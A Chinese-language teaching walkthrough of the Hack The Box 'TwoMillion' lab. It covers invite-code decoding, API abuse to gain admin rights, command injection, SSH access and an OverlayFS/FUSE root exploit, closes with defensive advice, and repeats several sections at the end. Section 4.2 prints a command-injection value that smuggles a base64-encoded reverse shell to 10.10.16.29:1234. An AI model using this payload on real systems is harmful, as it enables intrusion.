HTB-TwoMillion 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

使用 nmap<\/code> 进行常规扫描，识别开放端口和服务<\/li>

将目标域名添加到 \/etc\/hosts<\/code> 文件中进行解析<\/li>
<\/ul>
1.2 Web应用分析<\/h3>

访问 \/invite<\/code> 页面<\/li>
查看 \/register<\/code> 页面<\/li>
检查 invite.min.js<\/code> 文件，发现混淆的JavaScript代码<\/li>
<\/ul>
2. 邀请码获取<\/h2>
2.1 代码分析<\/h3>
通过分析 invite.min.js<\/code> 发现两个关键函数：<\/p>
function<\/span> i<\/span>(code<\/span>) {
<\/span><\/span>    var<\/span> formData<\/span> =<\/span> {"code"<\/span>:<\/span> code<\/span>};
<\/span><\/span>    $<\/span>.ajax<\/span>({
<\/span><\/span>        type<\/span>:<\/span> "POST"<\/span>,
<\/span><\/span>        dataType<\/span>:<\/span> "json"<\/span>,
<\/span><\/span>        data<\/span>:<\/span> formData<\/span>,
<\/span><\/span>        url<\/span>:<\/span> '\/api\/v1\/invite\/verify'<\/span>,
<\/span><\/span>        success<\/span>:<\/span> function<\/span>(response<\/span>) { console<\/span>.log<\/span>(response<\/span>); },
<\/span><\/span>        error<\/span>:<\/span> function<\/span>(response<\/span>) { console<\/span>.log<\/span>(response<\/span>); }
<\/span><\/span>    });
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> j<\/span>() {
<\/span><\/span>    $<\/span>.ajax<\/span>({
<\/span><\/span>        type<\/span>:<\/span> "POST"<\/span>,
<\/span><\/span>        dataType<\/span>:<\/span> "json"<\/span>,
<\/span><\/span>        url<\/span>:<\/span> '\/api\/v1\/invite\/how\/to\/generate'<\/span>,
<\/span><\/span>        success<\/span>:<\/span> function<\/span>(response<\/span>) { console<\/span>.log<\/span>(response<\/span>); },
<\/span><\/span>        error<\/span>:<\/span> function<\/span>(response<\/span>) { console<\/span>.log<\/span>(response<\/span>); }
<\/span><\/span>    });
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 获取邀请码生成方法<\/h3>

访问 \/api\/v1\/invite\/how\/to\/generate<\/code> API端点<\/li>
对返回的URL进行ROT13解密<\/li>
访问解密后的URL获取验证码<\/li>
对验证码进行Base64解密，得到邀请码：2ZCUD-A5QRI-DQYWM-0VXDF<\/code><\/li>
<\/ol>
2.3 注册账户<\/h3>
使用获取的邀请码完成注册并登录<\/p>
3. 权限提升至管理员<\/h2>
3.1 API接口枚举<\/h3>

搜集并分析所有可访问的API接口<\/li>
重点关注 \/api\/v1\/admin\/<\/code> 路径下的接口<\/li>
<\/ul>
3.2 管理员权限获取<\/h3>

不断尝试访问 \/api\/v1\/admin\/settings\/update<\/code> 接口<\/li>
根据返回信息调整请求数据<\/li>
最终将普通账户成功升级为管理员账户<\/li>
<\/ol>
4. 命令注入攻击<\/h2>
4.1 发现注入点<\/h3>

使用 \/api\/v1\/admin\/vpn\/generate<\/code> 接口<\/li>
注入点在 username<\/code> 参数<\/li>
推测后台使用PHP语言，可能使用 exec()<\/code> 或 system()<\/code> 函数执行命令<\/li>
<\/ul>
4.2 构造Payload<\/h3>
{
<\/span><\/span>    "username"<\/span>: "test;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yOS8xMjM0IDA+JjE= | base64 -d | bash;"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>其中Base64解码后为：bash -i >& \/dev\/tcp\/10.10.16.29\/1234 0>&1<\/code><\/p>
4.3 获取数据库凭据<\/h3>
通过命令注入成功获取数据库密码：78c9bd6f9e0c4b9defdbae37d7e91828<\/code><\/p>
5. 系统访问与横向移动<\/h2>
5.1 SSH登录<\/h3>
使用获取的数据库密码通过SSH登录系统<\/p>
5.2 初步枚举<\/h3>

上传 linpeas.sh<\/code> 进行系统枚举<\/li>
发现 pkexec<\/code> 没有SUID权限，无法直接用于提权<\/li>
<\/ul>
6. 权限提升至root<\/h2>
6.1 线索发现<\/h3>

检查 \/var\/mail<\/code> 发现提示：
"That one in OverlayFS \/ FUSE looks nasty. We can't get popped by that."
<\/code><\/pre>
<\/li>
<\/ul>
6.2 漏洞利用<\/h3>

搜索 OverlayFS \/ FUSE<\/code> 相关漏洞<\/li>
找到并复现对应的exploit<\/li>
成功获取root权限<\/li>
<\/ol>
7. 关键知识点总结<\/h2>

API枚举与分析<\/strong>：通过分析JavaScript文件发现隐藏API端点<\/li>
编码技术<\/strong>：ROT13和Base64编码的识别与解码<\/li>
权限提升技巧<\/strong>：通过API接口滥用提升账户权限<\/li>
命令注入<\/strong>：识别注入点并构造有效Payload<\/li>
系统提权<\/strong>：利用文件系统漏洞(OverlayFS\/FUSE)进行提权<\/li>
<\/ol>
8. 防御建议<\/h2>

对API接口实施严格的权限控制<\/li>
避免在前端暴露敏感API端点信息<\/li>
对用户输入进行严格过滤，防止命令注入<\/li>
及时更新系统组件，修补已知漏洞<\/li>
避免在系统提示中泄露可能被利用的信息<\/li>
<\/ol>

HTB-TwoMillion 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 邀请码获取<\/h2>

2.3 注册账户<\/h3> 使用获取的邀请码完成注册并登录<\/p>

3. 权限提升至管理员<\/h2>

4. 命令注入攻击<\/h2>

5.1 SSH登录<\/h3> 使用获取的数据库密码通过SSH登录系统<\/p>

6. 权限提升至root<\/h2>

8. 防御建议<\/h2> 对API接口实施严格的权限控制<\/li> 避免在前端暴露敏感API端点信息<\/li> 对用户输入进行严格过滤，防止命令注入<\/li> 及时更新系统组件，修补已知漏洞<\/li> 避免在系统提示中泄露可能被利用的信息<\/li> <\/ol>

2.3 注册账户<\/h3>
使用获取的邀请码完成注册并登录<\/p>

5.1 SSH登录<\/h3>
使用获取的数据库密码通过SSH登录系统<\/p>

8. 防御建议<\/h2>

对API接口实施严格的权限控制<\/li>
避免在前端暴露敏感API端点信息<\/li>
对用户输入进行严格过滤，防止命令注入<\/li>
及时更新系统组件，修补已知漏洞<\/li>
避免在系统提示中泄露可能被利用的信息<\/li> <\/ol>